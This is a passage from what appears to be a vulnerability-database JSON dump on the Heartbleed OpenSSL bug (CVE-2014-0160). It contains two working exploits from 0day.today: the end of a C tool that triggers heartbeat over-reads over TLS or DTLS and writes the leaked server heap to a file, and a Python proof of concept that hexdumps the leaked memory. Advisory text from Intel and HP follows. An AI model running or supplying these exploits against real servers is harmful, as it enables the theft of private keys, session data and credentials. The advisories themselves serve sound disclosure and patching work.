exit(0);\r\n }\r\n return;\r\n}\r\n \r\n \r\nvoid* dtlssneakyleaky(connection *c,char* filename, int verbose){\r\n char *p;\r\n int ssl_major,ssl_minor,al;\r\n int enc_err,n,i;\r\n SSL3_RECORD *rr;\r\n SSL_SESSION *sess;\r\n SSL* s;\r\n DTLS1_BITMAP *bitmap;\r\n unsigned int is_next_epoch;\r\n unsigned char md[EVP_MAX_MD_SIZE];\r\n short version;\r\n unsigned int mac_size, orig_len;\r\n \r\n rr= &(c->sslHandle->s3->rrec);\r\n 
sess=c->sslHandle->session;\r\n s = c->sslHandle;\r\n \r\nagain:\r\n if ((s->rstate != SSL_ST_READ_BODY) ||\r\n (s->packet_length < DTLS1_RT_HEADER_LENGTH)) {\r\n n=ssl3_read_n(s, DTLS1_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);\r\n if (n <= 0)\r\n goto apple;\r\n \r\n s->rstate=SSL_ST_READ_BODY;\r\n p=s->packet;\r\n rr->type= *(p++);\r\n ssl_major= *(p++);\r\n ssl_minor= *(p++);\r\n version=(ssl_major<<8)|ssl_minor;\r\n n2s(p,rr->epoch);\r\n memcpy(&(s->s3->read_sequence[2]), p, 6);\r\n p+=6;\r\n n2s(p,rr->length);\r\n if(rr->type==24){\r\n printf(\"[ heartbeat returned type=%d length=%u\\n\",rr->type, rr->length);\r\n if(rr->length > 16834){\r\n printf(\"[ error: got a malformed TLS length.\\n\");\r\n exit(0);\r\n }\r\n }\r\n else{\r\n printf(\"[ incorrect record type=%d length=%u returned\\n\",rr->type,rr->length);\r\n s->packet_length=0;\r\n badpackets++;\r\n if(badpackets > 3){\r\n printf(\"[ error: too many bad packets recieved\\n\");\r\n exit(0);\r\n }\r\n goto apple;\r\n }\r\n }\r\n \r\n if (rr->length > s->packet_length-DTLS1_RT_HEADER_LENGTH){\r\n i=rr->length;\r\n n=ssl3_read_n(s,i,i,1);\r\n if (n <= 0) goto apple;\r\n }\r\n if ( n != i)\r\n {\r\n rr->length = 0;\r\n s->packet_length = 0;\r\n goto again;\r\n }\r\n printf(\"[ decrypting SSL packet\\n\");\r\n s->rstate=SSL_ST_READ_HEADER;\r\n \r\n bitmap = dtls1_get_bitmap(s, rr, &is_next_epoch);\r\n if ( bitmap == NULL)\r\n {\r\n rr->length = 0;\r\n s->packet_length = 0;\r\n goto again;\r\n }\r\n \r\n if (!(s->d1->listen && rr->type == SSL3_RT_HANDSHAKE &&\r\n *p == SSL3_MT_CLIENT_HELLO) &&\r\n !dtls1_record_replay_check(s, bitmap))\r\n {\r\n rr->length = 0;\r\n s->packet_length=0;\r\n goto again;\r\n }\r\n \r\n if (rr->length == 0) goto again;\r\nif (is_next_epoch)\r\n {\r\n if ((SSL_in_init(s) || s->in_handshake) && !s->d1->listen)\r\n {\r\n dtls1_buffer_record(s, &(s->d1->unprocessed_rcds), rr->seq_num);\r\n }\r\n rr->length = 0;\r\n s->packet_length = 0;\r\n goto again;\r\n }\r\n \r\n \r\n rr->input= 
&(s->packet[DTLS1_RT_HEADER_LENGTH]);\r\n rr->data=rr->input;\r\n orig_len=rr->length;\r\n \r\n dtls1_enc(s,0);\r\n \r\n if((sess != NULL) &&\r\n (s->enc_read_ctx != NULL) &&\r\n (EVP_MD_CTX_md(s->read_hash) != NULL))\r\n {\r\n unsigned char *mac = NULL;\r\n unsigned char mac_tmp[EVP_MAX_MD_SIZE];\r\n mac_size=EVP_MD_CTX_size(s->read_hash);\r\n OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);\r\n orig_len = rr->length+((unsigned int)rr->type>>8);\r\n if(orig_len < mac_size ||\r\n (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&\r\n orig_len < mac_size+1)){\r\n al=SSL_AD_DECODE_ERROR;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\r\n }\r\n if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){\r\n mac = mac_tmp;\r\n ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\r\n rr->length -= mac_size;\r\n }\r\n else{\r\n rr->length -= mac_size;\r\n mac = &rr->data[rr->length];\r\n }\r\n i = tls1_mac(s,md,0);\r\n \r\n if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)\r\n enc_err = -1;\r\n \r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+mac_size)\r\n enc_err = -1;\r\n }\r\n if(enc_err < 0){\r\n al=SSL_AD_BAD_RECORD_MAC;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\r\n goto apple;\r\n }\r\n if(s->expand != NULL){\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n if (!ssl3_do_uncompress(s)) {\r\n al=SSL_AD_DECOMPRESSION_FAILURE;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\r\n goto apple;\r\n }\r\n }\r\n \r\n if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n rr->off=0;\r\n s->packet_length=0;\r\n dtls1_record_bitmap_update(s, &(s->d1->bitmap));\r\n if(first==0){\r\n uint heartbleed_len = 0;\r\n char* fp = s->s3->rrec.data;\r\n 
(long)fp++;\r\n memcpy(&heartbleed_len,fp,2);\r\n heartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;\r\n first = 2;\r\n leakbytes = heartbleed_len + 16;\r\n printf(\"[ heartbleed leaked length=%u\\n\",heartbleed_len);\r\n }\r\n if(verbose==1){\r\n { unsigned int z; for (z=0; z<rr->length; z++) printf(\"%02X%c\",rr->data[z],((z+1)%16)?' ':'\\n'); }\r\n printf(\"\\n\");\r\n }\r\n leakbytes-=rr->length;\r\n if(leakbytes > 0){\r\n repeat = 1;\r\n }\r\n else{\r\n repeat = 0;\r\n }\r\n printf(\"[ final record type=%d, length=%u\\n\", rr->type, rr->length);\r\n int output = s->s3->rrec.length-3;\r\n if(output > 0){\r\n int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\r\n if(first==2){\r\n first--;\r\n write(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n /* first three bytes are resp+len */\r\n printf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length-3,filename);\r\n }\r\n else{\r\n /* heap data & 16 bytes padding */\r\n write(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n printf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length,filename);\r\n }\r\n close(fd);\r\n }\r\n else{\r\n printf(\"[ nothing from the heap to write\\n\");\r\n }\r\n \r\n dtls1_stop_timer(c->sslHandle);\r\n c->sslHandle->tlsext_hb_seq++;\r\n c->sslHandle->tlsext_hb_pending = 0;\r\n \r\n return;\r\napple:\r\n printf(\"[ problem handling SSL record packet - wrong type?\\n\");\r\n badpackets++;\r\n if(badpackets > 3){\r\n printf(\"[ error: too many bad packets recieved\\n\");\r\n exit(0);\r\n }\r\n return;\r\n}\r\n \r\nstatic DTLS1_BITMAP *\r\ndtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch)\r\n {\r\n \r\n *is_next_epoch = 0;\r\n \r\n if (rr->epoch == s->d1->r_epoch)\r\n return &s->d1->bitmap;\r\n \r\n else if (rr->epoch == (unsigned long)(s->d1->r_epoch + 1) &&\r\n (rr->type == SSL3_RT_HANDSHAKE ||\r\n rr->type == SSL3_RT_ALERT))\r\n {\r\n *is_next_epoch = 1;\r\n return &s->d1->next_bitmap;\r\n }\r\n \r\n return NULL;\r\n 
}\r\n \r\nstatic int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap)\r\n {\r\n int cmp;\r\n unsigned int shift;\r\n const unsigned char *seq = s->s3->read_sequence;\r\n \r\n cmp = satsub64be(seq,bitmap->max_seq_num);\r\n if (cmp > 0)\r\n {\r\n memcpy (s->s3->rrec.seq_num,seq,8);\r\n return 1;\r\n }\r\n shift = -cmp;\r\n if (shift >= sizeof(bitmap->map)*8)\r\n return 0;\r\n else if (bitmap->map & (1UL<<shift))\r\n return 0;\r\n \r\n memcpy (s->s3->rrec.seq_num,seq,8);\r\n return 1;\r\n }\r\n \r\nint satsub64be(const unsigned char *v1,const unsigned char *v2)\r\n{ int ret,sat,brw,i;\r\n \r\n if (sizeof(long) == 8) do\r\n { const union { long one; char little; } is_endian = {1};\r\n long l;\r\n \r\n if (is_endian.little) break;\r\n \r\n if (((size_t)v1|(size_t)v2)&0x7) break;\r\n \r\n l = *((long *)v1);\r\n l -= *((long *)v2);\r\n if (l>128) return 128;\r\n else if (l<-128) return -128;\r\n else return (int)l;\r\n } while (0);\r\n \r\n ret = (int)v1[7]-(int)v2[7];\r\n sat = 0;\r\n brw = ret>>8;\r\n if (ret & 0x80)\r\n { for (i=6;i>=0;i--)\r\n { brw += (int)v1[i]-(int)v2[i];\r\n sat |= ~brw;\r\n brw >>= 8;\r\n }\r\n }\r\n else\r\n { for (i=6;i>=0;i--)\r\n { brw += (int)v1[i]-(int)v2[i];\r\n sat |= brw;\r\n brw >>= 8;\r\n }\r\n }\r\n brw <<= 8;\r\n \r\n if (sat&0xff) return brw | 0x80;\r\n else return brw + (ret&0xFF);\r\n}\r\n \r\nstatic int\r\ndtls1_buffer_record(SSL *s, record_pqueue *queue, unsigned char *priority)\r\n {\r\n DTLS1_RECORD_DATA *rdata;\r\n pitem *item;\r\n \r\n if (pqueue_size(queue->q) >= 100)\r\n return 0;\r\n \r\n rdata = OPENSSL_malloc(sizeof(DTLS1_RECORD_DATA));\r\n item = pitem_new(priority, rdata);\r\n if (rdata == NULL || item == NULL)\r\n {\r\n if (rdata != NULL) OPENSSL_free(rdata);\r\n if (item != NULL) pitem_free(item);\r\n \r\n SSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);\r\n return(0);\r\n }\r\n \r\n rdata->packet = s->packet;\r\n rdata->packet_length = s->packet_length;\r\n memcpy(&(rdata->rbuf), &(s->s3->rbuf), 
sizeof(SSL3_BUFFER));\r\n memcpy(&(rdata->rrec), &(s->s3->rrec), sizeof(SSL3_RECORD));\r\n \r\n item->data = rdata;\r\n \r\n#ifndef OPENSSL_NO_SCTP\r\n if (BIO_dgram_is_sctp(SSL_get_rbio(s)) &&\r\n (s->state == SSL3_ST_SR_FINISHED_A || s->state == SSL3_ST_CR_FINISHED_A)) {\r\n BIO_ctrl(SSL_get_rbio(s), BIO_CTRL_DGRAM_SCTP_GET_RCVINFO, sizeof(rdata->recordinfo), &rdata->recordinfo);\r\n }\r\n#endif\r\n \r\n if (pqueue_insert(queue->q, item) == NULL)\r\n {\r\n OPENSSL_free(rdata);\r\n pitem_free(item);\r\n return(0);\r\n }\r\n \r\n s->packet = NULL;\r\n s->packet_length = 0;\r\n memset(&(s->s3->rbuf), 0, sizeof(SSL3_BUFFER));\r\n memset(&(s->s3->rrec), 0, sizeof(SSL3_RECORD));\r\n \r\n if (!ssl3_setup_buffers(s))\r\n {\r\n SSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);\r\n OPENSSL_free(rdata);\r\n pitem_free(item);\r\n return(0);\r\n }\r\n \r\n return(1);\r\n }\r\n \r\n \r\nstatic void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap)\r\n {\r\n int cmp;\r\n unsigned int shift;\r\n const unsigned char *seq = s->s3->read_sequence;\r\n \r\n cmp = satsub64be(seq,bitmap->max_seq_num);\r\n if (cmp > 0)\r\n {\r\n shift = cmp;\r\n if (shift < sizeof(bitmap->map)*8)\r\n bitmap->map <<= shift, bitmap->map |= 1UL;\r\n else\r\n bitmap->map = 1UL;\r\n memcpy(bitmap->max_seq_num,seq,8);\r\n }\r\n else {\r\n shift = -cmp;\r\n if (shift < sizeof(bitmap->map)*8)\r\n bitmap->map |= 1UL<<shift;\r\n }\r\n }\r\n \r\n \r\nvoid usage(){\r\n printf(\"[\\n\");\r\n printf(\"[ --server|-s <ip/dns> - the server to target\\n\");\r\n printf(\"[ --port|-p <port> - the port to target\\n\");\r\n printf(\"[ --file|-f <filename> - file to write data to\\n\");\r\n printf(\"[ --bind|-b <ip> - bind to ip for exploiting clients\\n\");\r\n printf(\"[ --precmd|-c <n> - send precmd buffer (STARTTLS)\\n\");\r\n printf(\"[ 0 = SMTP\\n\");\r\n printf(\"[ 1 = POP3\\n\");\r\n printf(\"[ 2 = IMAP\\n\");\r\n printf(\"[ --loop|-l - loop the exploit attempts\\n\");\r\n printf(\"[ --type|-t <n> - 
select exploit to try\\n\");\r\n printf(\"[ 0 = null length\\n\");\r\n printf(\"[ 1 = max leak\\n\");\r\n printf(\"[ n = heartbeat payload_length\\n\");\r\n printf(\"[ --udp|-u - use dtls/udp\\n\");\r\n printf(\"[\\n\");\r\n printf(\"[ --verbose|-v - output leak to screen\\n\");\r\n printf(\"[ --help|-h - this output\\n\");\r\n printf(\"[\\n\");\r\n exit(0);\r\n}\r\n \r\nint main(int argc, char* argv[]){\r\n int ret, port, userc, index;\r\n int type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9;\r\n int loop = 0;\r\n struct hostent *h;\r\n connection* c;\r\n char *host, *file;\r\n int ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;\r\n printf(\"[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\\n\");\r\n printf(\"[ =============================================================\\n\");\r\n static struct option options[] = {\r\n {\"server\", 1, 0, 's'},\r\n {\"port\", 1, 0, 'p'},\r\n {\"file\", 1, 0, 'f'},\r\n {\"type\", 1, 0, 't'},\r\n {\"bind\", 1, 0, 'b'},\r\n {\"verbose\", 0, 0, 'v'},\r\n {\"precmd\", 1, 0, 'c'},\r\n {\"loop\", 0, 0, 'l'},\r\n {\"help\", 0, 0,'h'},\r\n {\"udp\", 0, 0, 'u'}\r\n };\r\n while(userc != -1) {\r\n userc = getopt_long(argc,argv,\"s:p:f:t:b:c:lvhu\",options,&index); \r\n switch(userc) {\r\n case -1:\r\n break;\r\n case 's':\r\n if(ihost==0){\r\n ihost = 1;\r\n h = gethostbyname(optarg); \r\n if(h==NULL){\r\n printf(\"[!] 
FATAL: unknown host '%s'\\n\",optarg);\r\n exit(1);\r\n }\r\n host = malloc(strlen(optarg) + 1);\r\n if(host==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n sprintf(host,\"%s\",optarg);\r\n }\r\n break;\r\n case 'p':\r\n if(iport==0){\r\n port = atoi(optarg);\r\n iport = 1;\r\n }\r\n break;\r\n case 'f':\r\n if(ifile==0){\r\n file = malloc(strlen(optarg) + 1);\r\n if(file==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n sprintf(file,\"%s\",optarg);\r\n ifile = 1;\r\n }\r\n break;\r\n case 't':\r\n if(itype==0){\r\n type = atoi(optarg);\r\n itype = 1;\r\n }\r\n break;\r\n case 'h':\r\n usage();\r\n break;\r\n case 'b':\r\n if(ihost==0){\r\n ihost = 1;\r\n host = malloc(strlen(optarg)+1);\r\n if(host==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n sprintf(host,\"%s\",optarg);\r\n bind = 1;\r\n }\r\n break;\r\n case 'c':\r\n if(iprecmd == 0){\r\n iprecmd = 1;\r\n precmd = atoi(optarg);\r\n }\r\n break;\r\n case 'v':\r\n verbose = 1;\r\n break;\r\n case 'l':\r\n loop = 1;\r\n break;\r\n case 'u':\r\n udp = 1;\r\n break;\r\n \r\n default:\r\n break;\r\n }\r\n }\r\n if(ihost==0||iport==0||ifile==0||itype==0){\r\n printf(\"[ try --help\\n\");\r\n exit(0);\r\n }\r\n ssl_init();\r\n if(bind==0){\r\n if (udp){\r\n c = dtls_client(ret, host, port);\r\n dtlsheartbleed(c, type);\r\n dtlssneakyleaky(c,file,verbose);\r\n while(repeat==1){\r\n dtlssneakyleaky(c,file,verbose);\r\n }\r\n while(loop==1){\r\n printf(\"[ entered heartbleed loop\\n\");\r\n first=0;\r\n repeat=1;\r\n dtlsheartbleed(c,type);\r\n while(repeat==1){\r\n dtlssneakyleaky(c,file,verbose);\r\n }\r\n }\r\n }\r\n else {\r\n ret = tcp_connect(host, port);\r\n pre_cmd(ret, precmd, verbose);\r\n c = tls_connect(ret);\r\n heartbleed(c,type);\r\n while(repeat==1){\r\n sneakyleaky(c,file,verbose);\r\n }\r\n while(loop==1){\r\n printf(\"[ entered heartbleed loop\\n\");\r\n first=0;\r\n repeat=1;\r\n heartbleed(c,type);\r\n while(repeat==1){\r\n 
sneakyleaky(c,file,verbose);\r\n }\r\n }\r\n }\r\n \r\n SSL_shutdown(c->sslHandle);\r\n close (ret);\r\n SSL_free(c->sslHandle);\r\n }\r\n else{\r\n int sd, pid, i;\r\n if (udp) {\r\n c = dtls_server(sd, host, port);\r\n while (1) {\r\n char * bytes = malloc(1024);\r\n struct sockaddr_in peer;\r\n socklen_t len = sizeof(peer);\r\n if (recvfrom(c->socket,bytes,1023,0,(struct sockaddr *)&peer,&len) > 0) {\r\n dtlsheartbleed(c,type);\r\n dtlssneakyleaky(c,file,verbose);\r\n while(loop==1){\r\n printf(\"[ entered heartbleed loop\\n\");\r\n first=0;\r\n repeat=0;\r\n dtlsheartbleed(c,type);\r\n while(repeat==1){\r\n dtlssneakyleaky(c,file,verbose);\r\n }\r\n }\r\n }\r\n }\r\n }\r\n else {\r\n ret = tcp_bind(host, port);\r\n while(1){\r\n sd=accept(ret,0,0);\r\n if(sd==-1){\r\n printf(\"[!] FATAL: problem with accept()\\n\");\r\n exit(0);\r\n }\r\n if(pid=fork()){\r\n close(sd);\r\n }\r\n else{\r\n c = tls_bind(sd);\r\n pre_cmd(ret, precmd, verbose);\r\n heartbleed(c,type);\r\n while(repeat==1){\r\n sneakyleaky(c,file,verbose);\r\n }\r\n while(loop==1){\r\n printf(\"[ entered heartbleed loop\\n\");\r\n first=0;\r\n repeat=0;\r\n heartbleed(c,type);\r\n while(repeat==1){\r\n sneakyleaky(c,file,verbose);\r\n }\r\n }\r\n printf(\"[ done.\\n\");\r\n exit(0);\r\n }\r\n }\r\n }\r\n }\r\n}\n\n# 0day.today [2018-04-13] #", "sourceHref": "https://0day.today/exploit/22172", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-19T11:11:23", "description": "This memory disclosure exploit is a quick and dirty demonstration of the TLS heartbeat extension vulnerability.", "cvss3": {}, "published": "2014-04-08T00:00:00", "type": "zdt", "title": "OpenSSL TLS Heartbeat Extension - Memory Disclosure", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-08T00:00:00", "id": "1337DAY-ID-22114", "href": "https://0day.today/exploit/description/22114", "sourceData": "#!/usr/bin/python\r\n \r\n# 
Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email\u00a0protected])\r\n# The author disclaims copyright to this source code.\r\n \r\nimport sys\r\nimport struct\r\nimport socket\r\nimport time\r\nimport select\r\nimport re\r\nfrom optparse import OptionParser\r\n \r\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\r\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\r\n \r\ndef h2bin(x):\r\n return x.replace(' ', '').replace('\\n', '').decode('hex')\r\n \r\nhello = h2bin('''\r\n16 03 02 00 dc 01 00 00 d8 03 02 53\r\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\r\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\r\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\r\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\r\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\r\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\r\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\r\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\r\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\r\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\r\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\r\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\r\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\r\n00 0f 00 01 01 \r\n''')\r\n \r\nhb = h2bin('''\r\n18 03 02 00 03\r\n01 40 00\r\n''')\r\n \r\ndef hexdump(s):\r\n for b in xrange(0, len(s), 16):\r\n lin = [c for c in s[b : b + 16]]\r\n hxdat = ' '.join('%02X' % ord(c) for c in lin)\r\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' 
)for c in lin)\r\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\r\n print\r\n \r\ndef recvall(s, length, timeout=5):\r\n endtime = time.time() + timeout\r\n rdata = ''\r\n remain = length\r\n while remain > 0:\r\n rtime = endtime - time.time()\r\n if rtime < 0:\r\n return None\r\n r, w, e = select.select([s], [], [], 5)\r\n if s in r:\r\n data = s.recv(remain)\r\n # EOF?\r\n if not data:\r\n return None\r\n rdata += data\r\n remain -= len(data)\r\n return rdata\r\n \r\n \r\ndef recvmsg(s):\r\n hdr = recvall(s, 5)\r\n if hdr is None:\r\n print 'Unexpected EOF receiving record header - server closed connection'\r\n return None, None, None\r\n typ, ver, ln = struct.unpack('>BHH', hdr)\r\n pay = recvall(s, ln, 10)\r\n if pay is None:\r\n print 'Unexpected EOF receiving record payload - server closed connection'\r\n return None, None, None\r\n print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\r\n return typ, ver, pay\r\n \r\ndef hit_hb(s):\r\n s.send(hb)\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ is None:\r\n print 'No heartbeat response received, server likely not vulnerable'\r\n return False\r\n \r\n if typ == 24:\r\n print 'Received heartbeat response:'\r\n hexdump(pay)\r\n if len(pay) > 3:\r\n print 'WARNING: server returned more data than it should - server is vulnerable!'\r\n else:\r\n print 'Server processed malformed heartbeat, but did not return any extra data.'\r\n return True\r\n \r\n if typ == 21:\r\n print 'Received alert:'\r\n hexdump(pay)\r\n print 'Server returned error, likely not vulnerable'\r\n return False\r\n \r\ndef main():\r\n opts, args = options.parse_args()\r\n if len(args) < 1:\r\n options.print_help()\r\n return\r\n \r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n print 'Connecting...'\r\n sys.stdout.flush()\r\n s.connect((args[0], opts.port))\r\n print 'Sending Client Hello...'\r\n sys.stdout.flush()\r\n s.send(hello)\r\n print 'Waiting for Server Hello...'\r\n 
sys.stdout.flush()\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ == None:\r\n print 'Server closed connection without sending Server Hello.'\r\n return\r\n # Look for server hello done message.\r\n if typ == 22 and ord(pay[0]) == 0x0E:\r\n break\r\n \r\n print 'Sending heartbeat request...'\r\n sys.stdout.flush()\r\n s.send(hb)\r\n hit_hb(s)\r\n \r\nif __name__ == '__main__':\r\n main()\n\n# 0day.today [2018-03-19] #", "sourceHref": "https://0day.today/exploit/22114", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "intel": [{"lastseen": "2022-05-09T11:49:12", "description": "**Summary: **\n\nOn April 7th 2014, OpenSSL.org published a Security Advisory concerning a missing bounds check bug in the implementation of the TLS heartbeat extension (CVE-2014-0160). Intel PSIRT will continue to update this advisory as additional information becomes available.\n\n**Description: **\n\nOn April 7th 2014, OpenSSL.org published a Security Advisory concerning a missing bounds check bug in the implementation of the TLS heartbeat extension (CVE-2014-0160). 
Intel is publishing an advisory concerning impacted Product and Services that have been updated due to CVE-2014-0160.\n", "cvss3": {}, "published": "2014-04-30T00:00:00", "type": "intel", "title": "Multiple Intel Software Products and API Services impacted by CVE-2014-0160", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-15T00:00:00", "id": "INTEL:INTEL-SA-00037", "href": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00037.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04236062\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04236062\r\nVersion: 2\r\n\r\nHPSBMU02994 rev.2 - HP BladeSystem c-Class Onboard Administrator (OA) running\r\nOpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-13\r\nLast Updated: 2014-04-18\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified in HP BladeSystem\r\nc-Class Onboard Administrator (OA) running OpenSSL. 
This is the OpenSSL\r\nvulnerability known as "Heartbleed" which could be exploited remotely\r\nresulting in disclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101500\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP BladeSystem c-Class Onboard Administrator (OA) v4.11 and 4.20\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for v4.20 of HP Onboard\r\nAdministrator (OA). This bulletin will be revised when an update for v4.20\r\nsoftware is released.\r\n\r\nHP has made Onboard Administrator (OA) v4.12 available to resolve the\r\nvulnerability here:\r\n\r\n 1) Go to: http://www.hp.com/go/oa\r\n 2) Click "Onboard Administrator Firmware"\r\n 3) Select "HP BLc3000 Onboard Administrator Option" or "HP BLc7000 Onboard\r\nAdministrator Option"\r\n 4) Select an appropriate operating system from the list of choices\r\n 5) On the page, find Firmware 4.12 for download\r\n\r\nNotes\r\n\r\nCustomers running OA v4.20 also have the option to downgrade OA firmware to\r\nOA v4.12 if that meets the requisite Hardware/feature support for the\r\nenclosure configuration.\r\nNo action is required unless the OA is running the firmware versions\r\nexplicitly listed as vulnerable.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 13 April 2014 Initial release\r\nVersion:2 (rev.2) - 18 April 2014 Added software update information for v4.12\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the 
recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. 
